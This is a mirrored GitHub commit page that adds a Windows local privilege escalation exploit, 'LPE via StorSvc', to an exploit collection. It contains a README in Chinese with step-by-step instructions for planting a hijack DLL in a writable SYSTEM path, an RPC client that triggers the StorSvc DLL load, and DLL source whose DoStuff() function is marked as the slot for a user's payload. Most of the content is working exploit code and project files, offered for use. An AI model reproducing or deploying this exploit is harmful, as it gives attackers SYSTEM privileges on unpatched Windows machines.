github-mirrors/Kernelhub
1
0
Fork 0
mirror of https://mirror.skon.top/github.com/Ascotbe/Kernelhub synced 2026-04-30 13:51:16 +08:00
Code Issues Packages Projects Releases Wiki Activity

update windows All-Kill Way

Browse Source
This commit is contained in:
Ascotbe
2023-02-15 14:44:08 +08:00
parent 1d324e612d
commit e55eb366ba
15 changed files with 4309 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

24
Windows/Universal/LPE via StorSvc/README.md Normal file
View File

@@ -0,0 +1,24 @@
## 概念验证
在这个 repo 中,我们提供了 2 个不同的源代码:
- RpcClient.exe触发 RPC 调用。
- SprintCSP.dll可以放置它来利用 DLL 劫持。此 PoC 运行`whoami`命令并将输出写入`C:\ProgramData\whoamiall.txt`. 如果您想扩展此 PoC 的功能,您可以`DoStuff()`在main.c中编辑函数。
**为了使其工作必须更改storsvc_c.c`#define`中的宏,以便利用程序适应目标机器的操作系统。**
## 步骤
1. 查找可写的 SYSTEM 路径`reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -v Path`
2. 将SprintCSP.dll复制到可写路径。有些路径是不需要管理员权限的
3. 执行RpcClient.exe
4. 查看`C:\ProgramData\whoamiall.txt`
PS生成好的脚本是调用cmd弹窗
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/LPE_via_StorSvc.gif)
## 代码来源
- [blackarrowsec](https://github.com/blackarrowsec/redteam-research)
- [OWwWO](https://github.com/OWwWO)

BIN
Windows/Universal/LPE via StorSvc/RpcClient.exe Normal file
View File

Binary file not shown.

31
Windows/Universal/LPE via StorSvc/RpcClient/RpcClient.sln Normal file
View File

@@ -0,0 +1,31 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.32413.511
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcClient", "RpcClient\RpcClient.vcxproj", "{7087F80C-0E20-4E81-909B-17FA23AF618D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Debug|x64.ActiveCfg = Debug|x64
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Debug|x64.Build.0 = Debug|x64
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Debug|x86.ActiveCfg = Debug|Win32
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Debug|x86.Build.0 = Debug|Win32
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Release|x64.ActiveCfg = Release|x64
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Release|x64.Build.0 = Release|x64
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Release|x86.ActiveCfg = Release|Win32
{7087F80C-0E20-4E81-909B-17FA23AF618D}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {9C8B97E6-8876-43C8-B59D-50D011AE98C5}
EndGlobalSection
EndGlobal

56
Windows/Universal/LPE via StorSvc/RpcClient/RpcClient/RpcClient.cpp Normal file
View File

@@ -0,0 +1,56 @@
#include "storsvc_h.h"
#include <iostream>
#include <windows.h>
#pragma comment(lib, "RpcRT4.lib")
int wmain(int argc, wchar_t* argv[])
{
RPC_STATUS status;
RPC_WSTR StringBinding;
RPC_BINDING_HANDLE Binding;
status = RpcStringBindingCompose(
NULL,
(RPC_WSTR)L"ncalrpc",
(RPC_WSTR)L"",
(RPC_WSTR)L"",
NULL,
&StringBinding
);
status = RpcBindingFromStringBinding(
StringBinding,
&Binding
);
status = RpcStringFree(
&StringBinding
);
RpcTryExcept
{
long result = Proc6_SvcRebootToFlashingMode(Binding, 0, 0);
if (result == 0)
wprintf(L"[+] Dll hijack triggered!");
else
wprintf(L"[!] Manual reboot of StorSvc service is required.");
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
}
RpcEndExcept
status = RpcBindingFree(&Binding);
}
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
return((void __RPC_FAR*) malloc(cBytes));
}
void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
free(p);
}

153
Windows/Universal/LPE via StorSvc/RpcClient/RpcClient/RpcClient.vcxproj Normal file
View File

@@ -0,0 +1,153 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{7087f80c-0e20-4e81-909b-17fa23af618d}</ProjectGuid>
<RootNamespace>RpcClient</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="RpcClient.cpp" />
<ClCompile Include="storsvc_c.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="storsvc_h.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

30
Windows/Universal/LPE via StorSvc/RpcClient/RpcClient/RpcClient.vcxproj.filters Normal file
View File

@@ -0,0 +1,30 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="RpcClient.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="storsvc_c.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="storsvc_h.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>

4
Windows/Universal/LPE via StorSvc/RpcClient/RpcClient/RpcClient.vcxproj.user Normal file
View File

@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

3359
Windows/Universal/LPE via StorSvc/RpcClient/RpcClient/storsvc_c.c Normal file
View File

File diff suppressed because it is too large Load Diff

153
Windows/Universal/LPE via StorSvc/RpcClient/RpcClient/storsvc_h.h Normal file
View File

@@ -0,0 +1,153 @@
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif
#ifndef __storsvc_h_h__
#define __storsvc_h_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __DefaultIfName_INTERFACE_DEFINED__
#define __DefaultIfName_INTERFACE_DEFINED__
typedef struct Struct_22_t
{
long StructMember0;
short StructMember1;
short StructMember2;
byte StructMember3[ 8 ];
} Struct_22_t;
typedef struct Struct_34_t
{
long StructMember0;
wchar_t StructMember1[ 260 ];
long StructMember2;
short StructMember3;
short StructMember4;
long StructMember5;
short StructMember6;
short StructMember7;
struct Struct_22_t StructMember8;
long StructMember9;
hyper StructMember10;
wchar_t StructMember11[ 260 ];
long StructMember12;
long StructMember13;
} Struct_34_t;
typedef struct Struct_76_t
{
long StructMember0[ 2 ];
} Struct_76_t;
typedef struct Struct_90_t
{
long StructMember0;
short StructMember1;
long StructMember2;
short StructMember3;
short StructMember4;
} Struct_90_t;
typedef struct Struct_112_t
{
long StructMember0;
long StructMember1;
long StructMember2;
short StructMember3;
} Struct_112_t;
typedef struct Struct_134_t
{
long StructMember0;
short StructMember1;
long StructMember2;
long StructMember3;
long StructMember4;
long StructMember5;
} Struct_134_t;
typedef struct Struct_164_t
{
double StructMember0;
wchar_t StructMember1[ 39 ];
} Struct_164_t;
long Proc0_SvcMountVolume( handle_t IDL_handle, short arg_1, long arg_2, long arg_3);
long Proc1_SvcDismountVolume( handle_t IDL_handle, short arg_1, long arg_2, long arg_3);
long Proc2_SvcFormatVolume( handle_t IDL_handle, short arg_1, long arg_2, long arg_3);
long Proc3_SvcGetStorageInstanceCount( handle_t IDL_handle, short arg_1, long *arg_2);
long Proc4_SvcGetStorageDeviceInfo( handle_t IDL_handle, short arg_1, long arg_2, struct Struct_34_t *arg_3);
long Proc5_CCleanupPolicy__CleanupItem( handle_t IDL_handle, short arg_1, short arg_2, long arg_3, struct Struct_76_t *arg_4);
long Proc6_SvcRebootToFlashingMode( handle_t IDL_handle, long arg_1, long arg_2);
long Proc7_SvcRebootToUosFlashing( handle_t IDL_handle, long arg_1, long arg_2);
long Proc8_SvcFinalizeVolume( handle_t IDL_handle, short arg_1, long arg_2);
long Proc9_SvcGetStorageSettings( handle_t IDL_handle, short arg_1, long arg_2, short arg_3, long *arg_4);
long Proc10_SvcResetStoragePolicySettings( handle_t IDL_handle);
long Proc11_SvcSetStorageSettings( handle_t IDL_handle, short arg_1, long arg_2, short arg_3, long arg_4);
long Proc12_SvcTriggerStorageCleanup( handle_t IDL_handle, struct Struct_90_t *arg_1);
long Proc13_SvcTriggerLowStorageNotification( handle_t IDL_handle, short arg_1, long arg_2);
__int3264 Proc14_SvcMoveFileInheritSecurity( handle_t IDL_handle, wchar_t *arg_1, wchar_t *arg_2, long arg_3);
long Proc15_SvcScanVolume( handle_t IDL_handle, short arg_1, long arg_2, struct Struct_112_t *arg_3);
long Proc16_SvcProcessStorageCardChange( handle_t IDL_handle);
long Proc17_SvcProvisionForAppInstall( handle_t IDL_handle, short arg_1, long arg_2);
long Proc18_SvcGetStorageInstanceCountForMaps( handle_t IDL_handle, short arg_1, long *arg_2);
long Proc19_SvcGetStoragePolicySettings( handle_t IDL_handle, short arg_1, wchar_t *arg_2, long *arg_3);
long Proc20_SvcSetStoragePolicySettings( handle_t IDL_handle, short arg_1, wchar_t *arg_2, long arg_3);
long Proc21_SvcTriggerStoragePolicies( handle_t IDL_handle, struct Struct_134_t *arg_1);
long Proc22_SvcPredictStorageHealth( handle_t IDL_handle, struct Struct_164_t **arg_1, long *arg_2);
long Proc23_SvcGetLastFailedSaveLocationPath( handle_t IDL_handle, wchar_t **arg_1);
extern RPC_IF_HANDLE DefaultIfName_v0_0_c_ifspec;
extern RPC_IF_HANDLE DefaultIfName_v0_0_s_ifspec;
#endif
#ifdef __cplusplus
}
#endif
#endif

BIN
Windows/Universal/LPE via StorSvc/SprintCSP.dll Normal file
View File

Binary file not shown.

31
Windows/Universal/LPE via StorSvc/SprintCSP/SprintCSP.sln Normal file
View File

@@ -0,0 +1,31 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.1.32421.90
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SprintCSP", "SprintCSP\SprintCSP.vcxproj", "{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Debug|x64.ActiveCfg = Debug|x64
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Debug|x64.Build.0 = Debug|x64
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Debug|x86.ActiveCfg = Debug|Win32
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Debug|x86.Build.0 = Debug|Win32
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Release|x64.ActiveCfg = Release|x64
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Release|x64.Build.0 = Release|x64
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Release|x86.ActiveCfg = Release|Win32
{239F08C0-2A3D-44A1-A53E-1FF6A2ACB398}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {97DA3635-DE9B-4111-B258-F7A021B25B22}
EndGlobalSection
EndGlobal

151
Windows/Universal/LPE via StorSvc/SprintCSP/SprintCSP/SprintCSP.vcxproj Normal file
View File

@@ -0,0 +1,151 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{239f08c0-2a3d-44a1-a53e-1ff6a2acb398}</ProjectGuid>
<RootNamespace>whoami</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<ProjectName>SprintCSP</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EntryPointSymbol>
</EntryPointSymbol>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

22
Windows/Universal/LPE via StorSvc/SprintCSP/SprintCSP/SprintCSP.vcxproj.filters Normal file
View File

@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Archivos de origen">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Archivos de encabezado">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Archivos de recursos">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.c">
<Filter>Archivos de origen</Filter>
</ClCompile>
</ItemGroup>
</Project>

4
Windows/Universal/LPE via StorSvc/SprintCSP/SprintCSP/SprintCSP.vcxproj.user Normal file
View File

@@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

291
Windows/Universal/LPE via StorSvc/SprintCSP/SprintCSP/main.c Normal file
View File

@@ -0,0 +1,291 @@
#include <windows.h>
#pragma warning(disable:4996)
#define DllExport __declspec( dllexport )
#define UNLEN 256
void DoStuff() {
// Replace all this code by your payload
STARTUPINFO si = { sizeof(STARTUPINFO) };
PROCESS_INFORMATION pi;
CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C whoami /all > C:\\ProgramData\\whoamiall.txt",
NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return;
}
// https://learn.microsoft.com/en-us/windows/win32/services/starting-a-service
VOID __stdcall DoStopSvc()
{
SERVICE_STATUS_PROCESS ssp;
DWORD dwStartTime = GetTickCount64();
DWORD dwBytesNeeded;
DWORD dwTimeout = 30000; // 30-second time-out
DWORD dwWaitTime;
SC_HANDLE schSCManager, schService;
LPCTSTR szSvcName = L"StorSvc";
// Get a handle to the SCM database.
schSCManager = OpenSCManager(
NULL, // local computer
NULL, // ServicesActive database
SC_MANAGER_ALL_ACCESS); // full access rights
if (NULL == schSCManager)
{
return;
}
// Get a handle to the service.
schService = OpenService(
schSCManager, // SCM database
szSvcName, // name of service
